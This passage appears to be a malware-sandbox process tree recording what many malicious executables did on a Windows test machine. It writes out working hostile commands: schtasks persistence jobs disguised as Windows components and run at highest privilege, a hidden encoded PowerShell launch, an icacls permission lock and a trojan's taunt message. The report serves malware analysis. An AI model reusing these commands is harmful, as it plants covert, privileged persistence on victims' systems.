  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:536
- C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe"
  2⤵
  PID:8136
- C:\Users\Admin\AppData\Local\Temp\Files\Payload.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Payload.exe"
  2⤵
  PID:4464
- C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe"
  2⤵
  PID:1100
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:4304
- - C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
    "C:\Windows\SysWOW64\SubDir\Windows Security Client.exe"
    3⤵
    PID:3708
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Client.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3724
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1340
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1340
    3⤵
    PID:2868
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  PID:6776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1228
  - - C:\Users\Admin\AppData\Local\Temp\Files\qemu-ga.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\qemu-ga.exe"
      4⤵
      PID:8120
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3640
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7460
- C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe"
  2⤵
  PID:5656
- C:\Users\Admin\AppData\Local\Temp\Files\MRK.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\MRK.exe"
  2⤵
  PID:7684
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7444
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7936
- C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"
  2⤵
  PID:2576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC0.tmp\FC1.tmp\FC2.bat C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe"
    3⤵
    PID:6448
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:3232
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:5448
  - - C:\Windows\explorer.exe
      explorer
      4⤵
      PID:6176
  - - C:\Windows\system32\msg.exe
      msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel
      4⤵
      PID:8904
- C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
  2⤵
  PID:5648
- - C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\d5335cb7e978f712440f2d4eb67ed8b8813daf0f0f817ec690a3c1419e41b4c2.exe"
    3⤵
    PID:7332
- C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3_1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3_1.exe"
  2⤵
  PID:5048
- C:\Users\Admin\AppData\Local\Temp\Files\kskskfsf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kskskfsf.exe"
  2⤵
  PID:2096
- C:\Users\Admin\AppData\Local\Temp\Files\2k.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\2k.exe"
  2⤵
  PID:7616
- C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe"
  2⤵
  PID:7860
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 348
    3⤵
    PID:228
- C:\Users\Admin\AppData\Local\Temp\Files\rty29.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty29.exe"
  2⤵
  PID:3828
- C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
  2⤵
  PID:6008
- C:\Users\Admin\AppData\Local\Temp\Files\easy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\easy.exe"
  2⤵
  PID:8464
- C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Update_new.exe"
  2⤵
  PID:8712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4848 -ip 4848
1⤵
PID:1868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1668 -ip 1668
1⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4848 -ip 4848
1⤵
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848
1⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4848 -ip 4848
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4848 -ip 4848
1⤵
PID:3052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
1⤵
PID:3620
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
  2⤵
  - Creates scheduled task(s)
  PID:1856
- C:\Windows\SysWOW64\chcp.com
  chcp 1251
  2⤵
  PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848
1⤵
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4848 -ip 4848
1⤵
PID:1828

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
1⤵
- Creates scheduled task(s)
PID:2984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
PID:1652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4848 -ip 4848
1⤵
PID:3712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4848 -ip 4848
1⤵
PID:1384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4848 -ip 4848
1⤵
PID:3028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\odt\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4848 -ip 4848
1⤵
PID:1072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\WaaSMedicAgent.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\DriverHostCrtNet\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 14 /tr "'C:\DriverHostCrtNet\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4848 -ip 4848
1⤵
PID:2516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\MoUsoCoreWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4848 -ip 4848
1⤵
PID:4192

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Libraries\MoUsoCoreWorker.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\MoUsoCoreWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4848 -ip 4848
1⤵
PID:3004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4848 -ip 4848
1⤵
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4848 -ip 4848
1⤵
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4848 -ip 4848
1⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4848 -ip 4848
1⤵
PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4848 -ip 4848
1⤵
PID:3780

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:4432
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:5188
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2012 -ip 2012
1⤵
PID:3620

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:6052
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:6208
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:6216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4848 -ip 4848
1⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:6756
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:5476
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:6792

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:6824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  PID:5576
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    PID:6212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4848 -ip 4848
1⤵
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4848 -ip 4848
1⤵
PID:6324

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:968
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:2960
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5888 -ip 5888
1⤵
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1984 -ip 1984
1⤵
PID:6156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5888 -ip 5888
1⤵
PID:7164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1984 -ip 1984
1⤵
PID:5292

C:\Program Files (x86)\Windows Mail\Idle.exe
"C:\Program Files (x86)\Windows Mail\Idle.exe"
1⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:3896
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:6740
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    PID:3468

C:\Recovery\WindowsRE\dllhost.exe
C:\Recovery\WindowsRE\dllhost.exe
1⤵
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5888 -ip 5888
1⤵
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1984 -ip 1984
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5888 -ip 5888
1⤵
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1984 -ip 1984
1⤵
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1984 -ip 1984
1⤵
PID:7112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5888 -ip 5888
1⤵
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4848 -ip 4848
1⤵
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1984 -ip 1984
1⤵
PID:2312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5888 -ip 5888
1⤵
PID:6784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2472 -ip 2472
1⤵
PID:1732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1984 -ip 1984
1⤵
PID:4664

C:\Users\Admin\AppData\Roaming\jarhhgw
C:\Users\Admin\AppData\Roaming\jarhhgw
1⤵
PID:5200
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 360
  2⤵
  - Program crash
  PID:6488

C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe
1⤵
PID:2656
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  2⤵
  PID:3644
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\AppData\Local\Temp\Files\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
    3⤵
    PID:7156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2472 -ip 2472
1⤵
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5888 -ip 5888
1⤵
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6796
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1984 -ip 1984
1⤵
PID:3288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5888 -ip 5888
1⤵
PID:952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2472 -ip 2472
1⤵
PID:6168

C:\Users\Admin\AppData\Local\Temp\B2AE.exe
C:\Users\Admin\AppData\Local\Temp\B2AE.exe
1⤵
PID:464
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 356
  2⤵
  - Program crash
  PID:7164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 464 -ip 464
1⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2472 -ip 2472
1⤵
PID:4352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5200 -ip 5200
1⤵
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2472 -ip 2472
1⤵
PID:7072

C:\Users\Admin\AppData\Local\Temp\1001.exe
C:\Users\Admin\AppData\Local\Temp\1001.exe
1⤵
PID:6712
- C:\Users\Admin\AppData\Local\Temp\1001.exe
  C:\Users\Admin\AppData\Local\Temp\1001.exe
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\a6876cda-9f0e-4ebe-bec3-5d191d5844ea" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:7004
